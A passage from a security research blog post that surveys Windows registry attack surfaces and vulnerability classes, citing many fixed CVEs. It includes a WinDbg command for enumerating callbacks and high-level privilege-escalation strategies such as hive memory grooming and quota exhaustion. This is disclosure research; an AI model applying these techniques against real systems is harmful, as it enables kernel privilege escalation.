blog post under the VRP_LOAD_DIFFERENCING_HIVE_INPUT name. However, a second, much more pressing problem is that communicating with the VRegDriver requires administrative rights, so it can only be used for testing purposes, but not in practical privilege escalation attacks. So, what options are we left with? Firstly, there are potential scenarios where the exploit is packaged in a mechanism that legitimately uses differencing hives, e.g., an MSIX-packaged application running in an app silo, or a specially crafted Docker container running in a server silo. In such cases, we provide our own hives by design, which are then loaded on the victim’s system on our behalf when the malicious program or container is started. The second option is to simply ignore the inability to load our own hive and use one already present in the system. In a default Windows installation, many built-in applications use differencing hives, and the \Registry\WC key can be easily enumerated and opened without any problems (unlike \Registry\A). Therefore, if we launch a program running inside an app silo (e.g., Notepad) as a local user, we can then operate on the differencing hives loaded by it. This is exactly what I did in most of my proof-of-concept exploits related to this functionality. Of course, it is possible that a given bug will require full binary control over the differencing hive in order to trigger it, but this is a relatively rare case: of the 10 vulnerabilities I identified in this code, only two of them required such a high degree of control over the hive.Alternative registry attack targets The most crucial attack surface associated with the registry is obviously its implementation within the Windows kernel. However, other types of software interact with the registry in many ways and can be also prone to privilege escalation attacks through this mechanism. They are discussed in the following sections.Drivers implementing registry callbacks Another area where potential registry-related security vulnerabilities can be found is Registry Callbacks. This mechanism, first introduced in Windows XP and still present today, provides an interface for kernel drivers to log or interfere with registry operations in real-time. One of the most obvious uses for this functionality is antivirus software, which relies on registry monitoring. Microsoft, aware of this need but wanting to avoid direct syscall hooking by drivers, was compelled to provide developers with an official, documented API for this purpose. From a technical standpoint, callbacks can be registered using either the CmRegisterCallback function or its more modern version, CmRegisterCallbackEx. The documentation for these functions serves as a good starting point for exploring the mechanism, as it seamlessly leads to the documentation of the callback function itself, and from there to the documentation of all the structures that describe the individual operations. Generally speaking, callbacks can monitor virtually any type of registry operation, both before ("pre" callbacks) and after ("post" callbacks) it is performed. They can be used to inspect what is happening in the system and log the details of specific events of interest. Callbacks can also influence the outcome of an operation. In "pre" notifications, they can modify input data or completely take control of the operation and return arbitrary information to the caller while bypassing the standard operation logic. During "post" notification handling, it is possible to influence both the status returned to the user and the output data. Overall, depending on the amount and types of operations supported in a callback, a completely error-free implementation can be really difficult to write. It requires excellent knowledge of the inner workings of the registry, as well as a very thorough reading of the documentation related to callbacks. The contracts that exist between the Windows kernel and the callback code can be very complicated, so in addition to the sources mentioned above, it's also worth reading the entire separate series of seven articles detailing various callback considerations, titled Filtering Registry Calls. Here are some examples of things that can go wrong in the implementation of callbacks: Standard user-mode memory access bugs. As per the documentation (refer to the table at the bottom of the Remarks section), pointers to output data received in "post" type callbacks contain the original user-mode addresses passed to the syscall by the caller. This means that if the callback wants to reference this data in any way, the only guarantee it has is that these pointers have been previously probed. However, it is still important to access this memory within a try/except block and to avoid potential double-fetch vulnerabilities by always copying the data to a kernel-mode buffer first before operating on it.A somewhat related but higher-level issue is excessive trust in the output data structure within "post" callbacks. The problem is that some registry syscalls return data in a strictly structured way, and since the "post" callback executes before returning to user mode, it might seem safe to trust that the output data conforms to its documented format (if one wants to use or slightly modify it). An example of such a syscall is NtQueryKey, which returns a specific structure for each of the several possible information classes. In theory, it would appear that a malicious program has not yet had the opportunity to modify this data, and it should still be valid when the callback executes. In practice, however, this is not the case, because the output data has already been copied to user-mode, and there may be a parallel user thread modifying it concurrently. Therefore, it is very important that if one wants to use the output data in the "post" callback, they must first fully sanitize it, assuming that it may be completely arbitrary and is as untrusted as any other input data.Moving up another level, it's important to prevent confused deputy problems that exploit the fact that callback code runs with kernel privileges. For example, if a callback wanted to redirect access to certain registry paths to another location, and it used the ZwCreateKey call without the OBJ_FORCE_ACCESS_CHECK flag to do so, it would allow an attacker to create keys in locations where they normally wouldn't have access.Bugs in the emulation of certain operations in "pre"-type callbacks. If a callback decides to handle a given request on its own and signal this to the kernel by returning the STATUS_CALLBACK_BYPASS code, it is responsible for filling all important fields in the corresponding REG_XXX_KEY_INFORMATION structure so that, in accordance with the expected syscall behavior, the output data is correctly returned to the caller (source: "When a registry filtering driver's RegistryCallback routine receives a pre-notification [...]" and "Alternatively, if the driver changes a status code from failure to success, it might have to provide appropriate output parameters.").Bugs in "post"-type callbacks that change an operation's status from success to failure. If we want to block an operation after it has already been executed, we must remember that it has already occurred, with all its consequences and side effects. To successfully pretend that it did not succeed, we would have to reverse all its visible effects for the user and release the resources allocated for this purpose. For some operations, this is very difficult or practically impossible to do cleanly, so I would personally recommend only blocking operations at the "pre" stage and refraining from trying to influence their outcome at the "post" stage (source: "If the driver changes a status code from success to failure, it might have to deallocate objects that the configuration manager allocated.").Challenges presented by error handling within "post"-type callbacks. As per the documentation, the kernel only differentiates between a STATUS_CALLBACK_BYPASS return value and all others, which means that it doesn't really discern callback success or failure. This is somewhat logical since, at this stage, there isn't a good way to handle failures – the operation has already been performed. On the other hand, it may be highly unintuitive, as the Windows kernel idiom "if (!NT_SUCCESS(Status)) { return Status; }" becomes ineffective here. If an error is returned, it won't propagate to user mode, and will only cause premature callback exit, potentially leaving some important operations unfinished. To address this, you should design "post" callbacks to be inherently fail-safe (e.g., include no dynamic allocations), or if this isn't feasible, implement error handling cautiously, ensuring that minor operation failures don't compromise the callback's overall logical/security guarantees.Issues surrounding the use of a key object pointer passed to the callback, in one of a few specific scenarios where it can have a non-NULL value but not point to a valid key object. This topic is explored in a short article in Microsoft Learn: Invalid Key Object Pointers in Registry Notifications.Issues in open/create operation callbacks due to missing or incorrect handling of symbolic links and other redirections, which are characterized by the return values STATUS_REPARSE and STATUS_REPARSE_GLOBAL.Bugs that result from a lack of transaction support where it is needed. This could be an incorrect assumption that every operation performed on the registry is non-transactional and its effect is visible immediately, and not only after the transaction is committed. The API function that is used to retrieve the transaction associated with a given key (if it exists) during callback execution is CmGetBoundTransaction.Issues arising from using the older API version, CmCallbackGetKeyObjectID, instead of the newer CmCallbackGetKeyObjectIDEx. The older version has some inherent problems discussed in the documentation, such as returning an outdated key path if the key name has been changed by an NtRenameKey operation.Issues stemming from an overreliance on the CmCallbackGetKeyObjectID(Ex) function to retrieve a key's full path. A local user can cause these functions to deterministically fail by creating and operating on a key with a path length exceeding 65535 bytes (the maximum length of a string represented by the UNICODE_STRING structure). This can be achieved using the key renaming trick described in CVE-2022-37990, and results in the CmCallbackGetKeyObjectID(Ex) function returning the STATUS_INSUFFICIENT_RESOURCES error code. This is problematic because the documentation for this function does not mention this error code, and there is no way to defend against it from the callback's perspective. The only options are to avoid relying on retrieving the full key path altogether, or to implement a defensive fallback plan if this operation fails.Logical bugs arising from attempts to block access to certain registry keys by path, but neglecting the key rename operation, which can change the key's name dynamically and bypass potential filtering logic in the handling of the open/create operations. Notably, it's difficult to blame developers for such mistakes, as even the official documentation discourages handling NtRenameKey operations, citing its high complexity (quote: "Several registry system calls are not documented because they are rarely used [...]"). As we can see, developers using these types of callbacks can fall into many traps, and the probability of introducing a bug increases with the complexity of the callback's logic. As a security researcher, there are two approaches to enumerating this attack surface to find vulnerable callbacks: static and dynamic. The static approach involves searching the file system (especially C:\Windows\system32\drivers) for the "CmRegisterCallback" string, as every driver that registers a callback must refer to this function or its "Ex" equivalent. As for the dynamic approach, the descriptors of all callbacks in the system are linked together in a doubly-linked list that begins in the global nt!CallbackListHead object. Although the structure of these descriptors is undocumented, my analysis indicates that the pointer to the callback function is located at offset 0x28 in Windows 11. Therefore, all callbacks registered in the system at a given moment can be listed using the following WinDbg command: 0: kd> !list -x "dqs @$extret+0x28 L1" CallbackListHead fffff801`c42f6cd8  fffff801`c42f6cd0 nt!CmpPreloadedHivesList ffffdc88`d377e418  fffff801`56a48df0 WdFilter!MpRegCallback ffffdc88`d8610b38  fffff801`59747410 applockerfltr!SmpRegistryCallback ffffdc88`d363e118  fffff801`57a05dd0 UCPD+0x5dd0 ffffdc88`ed11d788  fffff801`c3c2ba50 nt!VrpRegistryCallback ffffdc88`d860c758  fffff801`597510c0 bfs!BfsRegistryCallback As shown, even on a clean Windows 11 system, the operating system and its drivers register a substantial number of callbacks. In the listing above, the first line of output can be ignored, as it refers to the nt!CallbackListHead object, which is the beginning of the list and not a real callback descriptor. The remaining functions are associated with the following modules: WdFilter!MpRegCallback: a callback registered by Windows Defender, the default antivirus engine running on Windows.applockerfltr!SmpRegistryCallback: a callback registered by the Smartlocker Filter Driver, which is one of the drivers that implement the AppLocker/SmartLocker functionality at the kernel level.UCPD+0x5dd0: a callback associated with the UCPD.sys driver, which expands to "User Choice Protection Driver". This is a module that prevents third-party software from modifying the default application settings for certain file types and protocols, such as web browsers and PDF readers. As we can infer from the format of this symbol and its unresolved name, Microsoft does not currently provide PDB debug symbols for the executable image, but some information online indicates that such symbols were once available for older builds of the driver.nt!VrpRegistryCallback: a callback implemented by the VRegDriver, which is part of the core Windows kernel executable image, ntoskrnl.exe. It plays a crucial role in the system, as it is responsible for redirecting key references to their counterparts within differencing hives for containerized processes. It is likely the most interesting and complex callback registered by default in Windows.bfs!BfsRegistryCallback: the callback is a component of the Brokering File System driver. It is primarily responsible for supporting secure file access for applications running in an isolated environment (AppContainers). However, it also has a relatively simple registry callback that supports key opening/creation operations. It is not entirely clear why the functionality wasn't simply incorporated into the VrpRegistryCallback, which serves a very similar purpose. In my research, I primarily focused on reviewing the callback invocations in individual registry operations (specifically calls to the CmpCallCallBacksEx function), and on the correctness of the VrpRegistryCallback function implementation. As a result, I discovered CVE-2023-38141 in the former area, and three further bugs in the VRegDriver (CVE-2023-38140, CVE-2023-36803 and CVE-2023-36576). These reports serve as a very good example of the many types of problems that can occur in registry callbacks.Privileged registry clients: programs and drivers The final attack target related to the registry are the highly privileged users of this interface, that is, user-mode processes running with administrator/system rights, and kernel drivers that operate on the registry. The registry is a shared resource by design, and apart from app hives mounted in the special \Registry\A key, every program in the system can refer to any active key as long as it has the appropriate permissions. And for a malicious user, this means that they can try to exploit weaknesses exhibited by other processes when interacting with the registry, and secondly, they can try to actively interfere with them. I can personally imagine two main types of issues related to incorrect use of the registry, and both of them are quite high-level by nature. The first concern is related to the fact that the registry, as a part of the NT Object Manager model, undergoes standard access control through security access checks. Each registry key is mandatorily assigned a specific security descriptor. Therefore, as the name implies, it is crucial for system security that each key's descriptor has the minimum permissions required for proper functionality, while aligning with the author's intended security model for the application. From a technical perspective, a specific security descriptor for a given key can be set either during its creation through the lpSecurityAttributes argument of RegCreateKeyExW, or separately by calling the RegSetKeySecurity API. If no descriptor is explicitly set, the key assumes a default descriptor based largely on the security settings of its parent key. This model makes sense from a practical standpoint. It allows most applications to avoid dealing with the complexities of custom security descriptors, while still maintaining a reasonable level of security, as high-level keys in Windows typically have well-configured security settings. Consider the well-known HKLM\Software tree, where Win32 applications have stored their global settings for many years. The assumption is that ordinary users have read access to the global configuration within that tree, but only administrators can write to it. If an installer or application creates a new subkey under HKLM\Software without explicitly setting a descriptor, it inherits the default security properties, which is sufficient in most cases. However, certain situations require extra care to properly secure registry keys. For example, if an application stores highly sensitive data (e.g., user passwords) in the registry, it is important to ensure that both read and write permissions are restricted to the smallest possible group of users (e.g., administrators only). Additionally, when assigning custom security descriptors to keys in global system hives, you should exercise caution to avoid inadvertently granting write permissions to all system users. Furthermore, if a user has KEY_CREATE_LINK access to a global key used by higher-privileged processes, they can create a symbolic link within it, potentially resulting in a "confused deputy" problem and the ability to create registry keys under any path. In summary, for developers creating high-privilege code on Windows and utilizing the registry, it is essential to carefully handle the security descriptors of the keys they create and operate on. From a security researcher's perspective, it could be useful to develop tooling to list all keys that allow specific access types to particular groups in the system and run it periodically on different Windows versions and configurations. This approach can lead to some very easy bug discoveries, as it doesn't require any time spent on reverse engineering or code auditing. The second type of issue is more subtle and arises because a single "configuration unit" in the registry sometimes consists of multiple elements (keys, values) and must be modified atomically to prevent an inconsistent state and potential vulnerabilities.  For such cases, there is support for transactions in the registry. If a given process manages a configuration that is critical to system security and in which different elements must always be consistent with each other, then making use of the Transacted Registry (TxR) is practically mandatory. A significantly worse, though somewhat acceptable solution may be to implement a custom rollback logic, i.e., in the event of a failure of some individual operation, manually reversing the changes that have been applied so far. The worst case scenario is when a privileged program does not realize the seriousness of introducing partial changes to the registry, and implements its logic in a way typical of using the API in a best-effort manner, i.e.: calling Win32 functions as long as they succeed, and when any of them returns an error, then simply passing it up to the caller without any additional cleanup. Let's consider this bug class on the example of a hypothetical service that, through some local inter-process communication interface, allows users to register applications for startup. It creates a key structure under the HKLM\Software\CustomAutostart\ path, and for each such key it stores two values: the command line to run during system startup ("CommandLine"), and the username with whose privileges to run it ("UserName"). If the username value does not exist, it implicitly assumes that the program should start with system rights. Of course, the example service intends to be secure, so it only allows setting the username to the one corresponding to the security token of the requesting process. Operations on the registry take place in the following order: Create a new key named HKLM\Software\CustomAutostart\,Set the "CommandLine" value to the string provided by the client,Set the "UserName" value to the string provided by the client. The issue with this logic is that it's not transactional – if an error occurs, the execution simply aborts, leaving the partial state behind. For example, if operation #3 fails for any reason, an entry will be added to the autostart indicating that a controlled path should be launched with system rights. This directly leads to privilege escalation and was certainly not the developer's intention. One might wonder why any of these operations would fail, especially in a way controlled by an attacker. The answer is simple and was explained in the "Susceptibility to mishandling OOM conditions" section. A local attacker has at least two ways of influencing the success or failure of registry operations in the system: by filling the space of the hive they want to attack (if they have write access to at least one of its keys) or by occupying the global registry quota in memory, represented by the global nt!CmpGlobalQuota variable. Unfortunately, finding such vulnerabilities is more complicated than simply scanning the entire registry for overly permissive security descriptors. It requires identifying candidates of registry operations in the system that have appropriate characteristics (high privilege process, lack of transactionality, sensitivity to a partial/incomplete state), and then potentially reverse-engineering the specific software to get a deeper understanding of how it interacts with the registry. Tools like Process Monitor may come in handy at least in the first part of the process. One example of a vulnerability related to the incorrect guarantee of atomicity of system-critical structures is CVE-2024-26181. As a result of exhausting the global registry quota, it could lead to permanent damage to the HKLM\SAM hive, which stores particularly important information about users in the system, their passwords, group memberships, etc.Vulnerability primitives In this chapter, we will focus on classifying registry vulnerabilities based on the primitives they offer, and briefly discuss their practical consequences and potential exploitation methods.Pool memory corruption Pool memory corruption is probably the most common type of low-level vulnerability in the Windows kernel. In the context of the registry, this bug class is somewhat rarer than in other ring-0 components, but it certainly still occurs and is entirely possible. It manifests in its most "pure" form when the corruption happens within an auxiliary object that is temporarily allocated on the pools to implement a specific operation. One such example case is a report concerning three vulnerabilities—CVE-2022-37990, CVE-2022-38038, and CVE-2022-38039—all stemming from a fairly classic 16-bit integer overflow when calculating the length of a dynamically allocated buffer. Another example is CVE-2023-38154, where the cause of the buffer overflow was slightly more intricate and originated from a lack of error handling in one of the functions responsible for recovering the hive state from LOG files. The second type of pool memory corruption that can occur in the registry is problems managing long-lived objects that are used to cache some information from the hive mapping in more readily accessible pool memory — such as those described in post #6. In this case, we are usually dealing with UAF-type conditions, like releasing an object while there are still some active references to it. If I had to point to one object that could be most prone to this type of bug, it would probably be the Key Control Block, which is reference counted, used by the implementation of almost every registry syscall, and for which there are some very strong invariants critical for memory safety (e.g., the existence of only one KCB for a particular key in the global KCB tree). One issue related to KCBs was CVE-2022-44683, which resulted from incorrect handling of predefined keys in the NtNotifyChangeMultipleKeys system call. Another, slightly different category of UAFs on pools are situations in which this type of condition is not a direct consequence of a vulnerability, but more of a side effect. Let's take security descriptors as an example: they are located in the hive space, but the kernel also maintains a cache reflecting the state of these descriptors on the kernel pools (in _CMHIVE.SecurityCache and related fields). Therefore, if for some reason a security descriptor in the hive is freed prematurely, this problem will also be automatically reflected in the cache, and some keys may start to have a dangling KCB.CachedSecurity pointer set to the released object. I have taken advantage of this fact many times in my reports to Microsoft, because it was very useful for reliably triggering crashes. While generating a bugcheck based on the UAF of the _CM_KEY_SECURITY structure in the hive is possible, it is much more convoluted than simply turning on the Special Pool mechanism and making the kernel refer to the cached copy of the security descriptor (a few examples: CVE-2023-23421, CVE-2023-35382, CVE-2023-38139). In some cases, exploiting memory corruption on pools may also offer some advantages over exploiting hive-based memory corruption, so it is definitely worth remembering this behavior for the future. When it comes to the strictly technical aspects of kernel pool exploitation, I won't delve into it too deeply here. I didn't specifically focus on it in my research, and there aren't many interesting registry-specific details to mention in this context. If you are interested to learn more about this topic, please refer to the resources available online.Hive memory corruption The second type of memory corruption encountered in the registry is hive-based memory corruption. This class of bugs is unique to the registry and is based on the fact that data stored in hives serves a dual role. It stores information persistently on disk, but it also works as the representation of the hive in memory in the exact same form. The data is then operated on using C code through pointers, helper functions like memcpy, and so on. Given all this, it doesn't come as a surprise that classic vulnerabilities such as buffer overflows or use-after-free can also occur within this region. So far, during my research, I have managed to find 17 hive-based memory corruption issues, which constitutes approximately 32% of all 53 vulnerabilities that have been fixed by Microsoft in security bulletins. The vast majority of them were related to just two mechanisms – reference counting security descriptors and operating on subkey lists – but there were also cases of bugs related to other types of objects. I have started using the term "inconsistent hive state", referring to any situation where the regf format state either ceases to be internally consistent or stops accurately reflecting cached copies of the same data within other kernel objects. I described one such issue here, where the _CM_BIG_DATA.Count field stops correctly corresponding to the _CM_KEY_VALUE.DataLength field for the same registry value. However, despite this specific behavior being incorrect, according to both my analysis and Microsoft's, it doesn't have any security implications for the system. In this context, the term "hive-based memory corruption" denotes a slightly narrower group of issues that not only allow reaching any inconsistent state but specifically enable overwriting valid regf structures with attacker-controlled data. The general scheme for exploiting hive-based memory corruption closely resembles the typical exploitation of any other memory corruption. The attacker's initial objective is to leverage the available primitive and manipulate memory allocations/deallocations to overwrite a specific object in a controlled manner. On modern systems, achieving this stage reliably within the heap or kernel pools can be challenging due to allocator randomization and enforced consistency checks. However, the cell allocator implemented by the Windows kernel is highly favorable for the attacker: it lacks any safeguards, and its behavior is entirely deterministic, which greatly simplifies this stage of exploit development. One could even argue that, given the properties of this allocator, virtually any memory corruption primitive within the regf format can be transformed into complete control of the hive in memory with some effort. With this assumption, let's consider what to do next. Even if we have absolute control over all the internal data of the mapped hive, we are still limited to its mapping in memory, which in itself does not give us much. The question arises as to how we can "escape" from this memory region and use hive memory corruption to overwrite something more interesting, like an arbitrary address in kernel memory (e.g., the security token of our process). First of all, it is worth noting that such an escape is not always necessary – if the attack is carried out in one of the system hives (SOFTWARE, SYSTEM, etc.), we may not need to corrupt the kernel memory at all. In this case, we could simply perform a data-only attack and modify some system configuration, grant ourselves access to important system keys, etc. However, with many bugs, attacking a highly privileged hive is not possible. Then, the other option available to the attacker is to modify one of the cells to break some invariant of the regf format, and cause a second-order side effect in the form of a kernel pool corruption. Some random ideas are:Setting too long a key name or inserting the illegal character '\' into the name,Creating a fake exit node key,Corrupting the binary structure of a security descriptor so that the internal APIs operating on them start misbehaving,Crafting a tree structure within the hive with a depth greater than the maximum allowed (512 levels of nesting),... and many, many others. However, during experiments exploring practical exploitation, I discovered an even better method that grants an attacker the ability to perform reliable arbitrary read and write operations in kernel memory—the ultimate primitive. This method exploits the behavior of 32-bit cell index values, which exhibit unusual behavior when they exceed the hive's total size. I won't elaborate on the full technique here, but for those interested, I discussed it during my presentation at the OffensiveCon conference in May 2024. The subject of exploiting hive memory corruption will be also covered in detail in its own dedicated blog post in the future.Invalid cell indexes This is a class of bugs that manifests directly when an incorrect cell index appears in an object—either in a cell within the hive or in a structure on kernel pools, like KCB. These issues can be divided into three subgroups, depending on the degree of control an attacker can gain over the cell index.Cell index 0xFFFFFFFF (HCELL_NIL) This is a special marker that indicates that a given structure member/variable of type HCELL_INDEX doesn't point to any specific cell, which is equivalent to a NULL pointer in C. There are many situations where the value 0xFFFFFFFF (in other words, -1) is used and even desired, e.g. to signal that an optional object doesn't exist and shouldn't be processed. The kernel code is prepared for such cases and correctly checks whether a given cell index is equal to this marker before operating on it. However, problems can arise when the value ends up in a place where the kernel always expects a valid index. Any mandatory field in a specific object can be potentially subject to this problem, such as the _CM_KEY_NODE.Security field, which must always point to a valid descriptor and should never be equal to -1 (other than for exit nodes). Some examples of such vulnerabilities include:CVE-2023-21772: an unexpected value of -1 being set in _CM_KEY_NODE.Security due to faulty logic in the registry virtualization code, which first freed the old descriptor and only then attempted to allocate a new one, which could fail, leaving the key without any assigned security descriptor.CVE-2023-35357: an unexpected value of -1 being set in KCB.KeyCell, because the code assumed that it was operating on a physically existing base key, while in practice it could operate on a layered key with Merge-Unbacked semantics, which does not have its own key node, but relies solely on key nodes at lower levels of the key stack.CVE-2023-35358: another case of an unexpected value of -1 being set in KCB.KeyCell, while the kernel expected that at least one key in the given key node stack would have an allocated key node object. The source of the problem here was incorrect integration of transactions and differencing hives. When such a problem occurs, it always manifests by the value -1 being passed as the cell index to the HvpGetCellPaged function. For decades, this function completely trusted its parameters, assuming that the input cell index would always be within the bounds of the given hive. Consequently, calling HvpGetCellPaged with a cell index of 0xFFFFFFFF would result in the execution of the following code: _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {   _HMAP_ENTRY *Entry = &Hive->Storage[1].Map->Directory[0x3FF]->Table[0x1FF];   return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + 0xFFF + 4; } In other words, the function would refer to the Volatile (1) map cell, and within it, to the last element of the Directory and then the Table arrays. Considering the "small dir" optimization described in post #6, it becomes clear that this cell map walk could result in an out-of-bounds memory access within the kernel pools (beyond the boundaries of the _CMHIVE structure). Personally, I haven't tried to transform this primitive into anything more useful, but it seems evident that with some control over the kernel memory around _CMHIVE, it should theoretically be possible to get the HvpGetCellPaged function to return any address chosen by the attacker. Further exploitation prospects would largely depend on the subsequent operations that would be performed on such a fake cell, and the extent to which a local user could influence them. In summary, I've always considered these types of bugs as "exploitable on paper, but quite difficult to exploit in practice." Ultimately, none of this matters much, because it seems that Microsoft noticed a trend in these vulnerabilities and, in July 2023, added a special condition to the HvpGetCellFlat and HvpGetCellPaged functions:   if (Index == HCELL_NIL) {     KeBugCheckEx(REGISTRY_ERROR, 0x32, 1, Hive, 0xFFFFFFFF);  } This basically means that the specific case of index -1 has been completely mitigated, since rather than allowing any chance of exploitation, the system now immediately shuts down with a Blue Screen of Death. As a result, the bug class no longer has any security implications. However, I do feel a bit disappointed – if Microsoft deemed the check sufficiently important to add to the code, they could have made it just a tiny bit stronger, for example:   if ((Index & 0x7FFFFFFF) >= Hive->Storage[Index >> 31].Length) {     KeBugCheckEx(...);   } The above check would reject all cell indexes exceeding the length of the corresponding storage type, and it is exactly what the HvpReleaseCellPaged function currently does. Checking this slightly stronger condition in one fell swoop would handle invalid indexes of -1 and completely mitigate the previously mentioned technique of out-of-bounds cell indexes. While not introduced yet, I still secretly hope that it will happen one day... 🙂Dangling (out-of-date) cell indexes Another group of vulnerabilities related to cell indexes are cases where, after a cell is freed, its index remains in an active cell within the registry. Simply put, these are just the cell-specific use-after-free conditions, and so the category very closely overlaps with the previously described hive-based memory corruption. Notable examples of such bugs include:CVE-2022-37988: Caused by the internal HvReallocateCell function potentially failing when shrinking an existing cell, which its caller assumed was impossible.CVE-2023-23420: A bug in the transactional key rename operation could lead to a dangling cell index in a key's subkey list, pointing to a freed key node.CVE-2024-26182: Caused by mishandling a partial success situation where an internal function might successfully perform some operations on the hive (reallocate existing subkey lists) but ultimately return an error code, causing the caller to skip updating the _CM_KEY_NODE.SubKeyLists[...] field accordingly.All use-after-free vulnerabilities in security descriptors due to incorrect reference counting: CVE-2022-34707, CVE-2023-28248, CVE-2023-35356, CVE-2023-35382, CVE-2023-38139, and CVE-2024-43641. In general, UAF bugs within the hive are powerful primitives that can typically be exploited to achieve total control over the hive's internal data. The fact that both exploits I wrote to demonstrate practical exploitation of hive memory corruption vulnerabilities fall into this category (CVE-2022-34707, CVE-2023-23420) can serve as anecdotal evidence of this statement.Fully controlled/arbitrary cell indexes The last type of issues where cell indexes play a major role are situations in which the user somehow obtains full control over the entire 32-bit index value, which is then referenced as a valid cell by the kernel. Notably, this is not about some second-order effect of hive memory corruption, but vulnerabilities where this primitive is the root cause of the problem. Such situations happen relatively rarely, but there have been at least two such cases in the past: CVE-2022-34708: missing verification of the _CM_KEY_SECURITY.Blink field in the CmpValidateHiveSecurityDescriptors function for the root security descriptor in the hive,CVE-2023-35356: referencing the _CM_KEY_NODE.ValueList.List field in a predefined key, in which the ValueList structure has completely different semantics, and its List field can be set to an arbitrary value. Given that the correctness of cell indexes is a fairly obvious requirement known to Microsoft kernel developers, they pay close attention to verifying them thoroughly. For this reason, I think that the chance we will have many more such bugs in the future is slim. As for their exploitation, they may seem similar in nature to the way hive memory corruption can be exploited with out-of-bounds cell indexes, but in fact, these are two different scenarios. With hive-based memory corruption, we can dynamically change the value of a cell index multiple times as needed, and here, we would only have one specific 32-bit value at our disposal. If, in a hypothetical vulnerability, some interesting operations were performed on such a controlled index, I would probably still reduce the problem to the typical UAF case, try to obtain full binary control over the hive, and continue from there.Low-level information disclosure (memory, pointers) Since the registry code is written in C and operates with kernel privileges, and additionally has not yet been completely rewritten to use zeroing ExAllocatePool functions, it is natural that it may be vulnerable to memory disclosure issues when copying output data to user-mode. The most canonical example of such a bug was CVE-2023-38140, where the VrpPostEnumerateKey function (one of the sub-handlers of the VRegDriver registry callback) allocated a buffer on kernel pools with a user-controlled length, filled it with some amount of data – potentially less than the buffer size – and then copied the entire buffer back to user mode, including uninitialized bytes at the end of the allocation. However, besides this typical memory disclosure scenario, it is worth noting two more things in the context of the registry. One of them is that, as we know, the registry operates not only on memory but also on various files on disk, and therefore the filesystem becomes another type of data sink where data leakage can also occur. And so, for example, in CVE-2022-35768, kernel pool memory could be disclosed directly to the hive file due to an out-of-bounds read vulnerability, and in CVE-2023-28271, both uninitialized data and various kernel-mode pointers were leaked to KTM transaction log files. The second interesting observation is that the registry implementation does not have to be solely the source of the data leak, but can also be just a medium through which it happens. There is a certain group of keys and values that are readable by ordinary users and initialized with binary data by the kernel and drivers using ZwSetValueKey and similar functions. Therefore, there is a risk that some uninitialized data may leak through this channel, and indeed during my Bochspwn Reloaded research in 2018, I identified several instances of such leaks, such as CVE-2018-0898, CVE-2018-0899, and CVE-2018-0900.Broken security guarantees, API contracts and common sense assumptions Besides maintaining internal consistency and being free of low-level bugs, it's also important that the registry behaves logically and predictably, even under unusual conditions. It must adhere to the overall security model of Windows NT, operate in accordance with its public documentation, and behave in a way that aligns with common sense expectations. Failure to do so could result in various problems in the client software that interacts with it, but identifying such deviations from expected behavior can be challenging, as it requires deep understanding of the interface's high-level principles and the practical implications of violating them. In the following subsections, I will discuss a few examples of issues where the registry's behavior was inconsistent with documentation, system architecture, or common sense.Security access rights enforcement The registry implementation must enforce security checks, meaning it must verify appropriate access rights to a key when opening it, and then again when performing specific operations on the obtained handle. Generally, the registry manages this well in most cases. However, there were two bugs in the past that allowed a local user to perform certain operations that they theoretically didn't have sufficient permissions for: CVE-2023-21750: Due to a logic bug in the CmKeyBodyRemapToVirtual function (related to registry virtualization), it was possible to delete certain keys within the HKLM\Software hive with only KEY_READ and KEY_SET_VALUE rights, without the normally required DELETE right.CVE-2023-36404: In this case, it was possible to gain access to the values of certain registry keys despite lacking appropriate rights. The attack itself was complex and required specific circumstances: loading a differencing hive overlaid on a system hive with a specially crafted key structure, and then having a system component create a secret key in that system hive. Because of the fact that the handle to the layered key would be opened earlier (and the security access check would be performed at that point in time), creating a new key at a lower level with more restricted permissions wouldn't be considered later, leading to potential information disclosure. As shown, both these bugs were directly related to incorrect or missing permissions verification, but they weren't particularly attractive in terms of practical attacks. A much more appealing bug was CVE-2019-0881, discovered in registry virtualization a few years earlier by James Forshaw. That vulnerability allowed unprivileged users to read every registry value in the system regardless of the user's privileges, which is about as powerful as a registry infoleak can get.Confused deputy problems with predefined keys Predefined keys probably don't need any further introduction at this point in the series. In this specific case of the confused deputy problem, the bug report for CVE-2023-35633 captures the essence of the issue well: if a local attacker had binary control over a hive, they could cause the use of an API like RegOpenKeyExW on any key within that hive to return one of the predefined pseudo-handles like HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER, etc., instead of a normal handle to that key. This behavior was undocumented and unexpected for developers using registry in their code. Unsurprisingly, finding a privileged process that did something interesting on a user-controlled hive wasn't that hard, and it turned out that there was indeed a service in Windows that opened a key inside the HKCU of each logged-in user, and recursively set permissive access rights on that key. By abusing predefined handles, it was possible to redirect the operation and grant ourselves full access to one of the global keys in the system, leading to a fairly straightforward privilege escalation. If you are interested in learning more about the bug and its practical exploitation, please refer to my Windows Registry Deja Vu: The Return of Confused Deputies presentation from CONFidence 2024. In many ways, this attack was a resurrection of a similar confused deputy problem, CVE-2010-0237, which I had discovered together with Gynvael Coldwind. The main difference was that at that time, the redirection of access to keys was achieved via symbolic links, a more obvious and widely known mechanism.Atomicity of KTM transactions The main feature of any transaction implementation is that it should guarantee atomicity – that is, either apply all changes being part of the transaction, or none of them. Imagine my surprise then, when I discovered that the registry transaction implementation integrated with the KTM did not guarantee atomicity at all, but merely tried really hard to maintain it. The main problem was that it wasn't designed to handle OOM errors (for example, when a hive was completely full) and, as a result, when such a problem occurred in the middle of committing a transaction, there was no good way to reverse the changes already applied. The Configuration Manager falsely returned a success code to the caller, while retrying to commit the remaining part of the transaction every 30 seconds, hoping that some space would free up in the registry in the meantime, and the operations would eventually succeed. This type of behavior obviously contradicted both the documentation and common sense about how transactions should work. I reported this issue as CVE-2023-32019, and Microsoft fixed it by completely removing a large part of the code that implemented this functionality, as it was simply impossible to fix correctly without completely redesigning it from scratch. Fortunately, in Windows 10, an alternative transaction implementation for the registry called lightweight transactions was introduced, which was designed correctly and did not have the same problem. As a result, a decision was made to internally redirect the handling of KTM transactions within the Windows kernel to the same engine that is responsible for lightweight transactions.Containerized registry escapes The general goal of differencing hives and layered keys is to implement registry containerization. This mechanism creates an isolated registry view for a specific group of processes, without direct access to the host registry (a sort of "chroot" for the Windows registry). Unfortunately, there isn't much official documentation on this topic, and it's particularly difficult to find information on whether this type of containerization is a Microsoft-supported security boundary that warrants fixes in the monthly security bulletins. I think it is reasonable to expect that since the mechanism is used to 